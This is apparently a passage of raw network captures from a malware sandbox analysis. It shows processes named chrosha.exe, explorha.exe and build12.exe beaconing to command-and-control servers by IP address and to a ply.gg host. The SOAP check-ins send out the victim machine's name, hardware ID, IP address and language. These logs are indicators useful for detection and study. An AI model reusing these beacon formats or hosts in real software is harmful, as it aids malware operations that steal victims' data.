                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
929 | 192.168.2.5 | 50779 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:15.106594086 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:15.363140106 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
930 | 192.168.2.5 | 50780 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:15.475387096 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:15.719880104 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
931 | 192.168.2.5 | 50781 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:15.730767965 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:15.982017040 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
932 | 192.168.2.5 | 50782 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:15.975219965 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:16.227665901 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
933 | 192.168.2.5 | 50783 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:16.235085011 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:16.489460945 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
934 | 192.168.2.5 | 50784 | 147.185.221.19 | 30946 | 5608 | C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:16.340714931 CEST | 224 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 95713
Expect: 100-continue
Accept-Encoding: gzip, deflate
Apr 19, 2024 03:34:16.976345062 CEST | 1289 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 95713
Expect: 100-continue
Accept-Encoding: gzip, deflate
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
Apr 19, 2024 03:34:18.843758106 CEST | 408 | IN | HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:18 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
935 | 192.168.2.5 | 50785 | 147.185.221.19 | 30946 | 7324 | C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:16.341315985 CEST | 224 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 95714
Expect: 100-continue
Accept-Encoding: gzip, deflate
Apr 19, 2024 03:34:16.984699011 CEST | 1289 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 95714
Expect: 100-continue
Accept-Encoding: gzip, deflate
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
Apr 19, 2024 03:34:18.847451925 CEST | 408 | IN | HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:18 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      936192.168.2.550786193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.588253021 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:16.830483913 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
937 | 192.168.2.5 | 50787 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:16.853645086 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:17.100564957 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
938 | 192.168.2.5 | 50788 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:17.081065893 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:17.327124119 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
939 | 192.168.2.5 | 50789 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:17.354295015 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:17.607673883 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
940 | 192.168.2.5 | 50790 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:17.690479040 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:17.933073997 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
941 | 192.168.2.5 | 50791 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:17.958326101 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:18.203187943 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
942 | 192.168.2.5 | 50792 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:18.188877106 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:18.446260929 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
943 | 192.168.2.5 | 50793 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:18.451993942 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:18.700550079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
944 | 192.168.2.5 | 50794 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:18.807121992 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:19.054248095 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
945 | 192.168.2.5 | 50795 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:19.058971882 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:19.307957888 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
946 | 192.168.2.5 | 50796 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:19.313164949 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
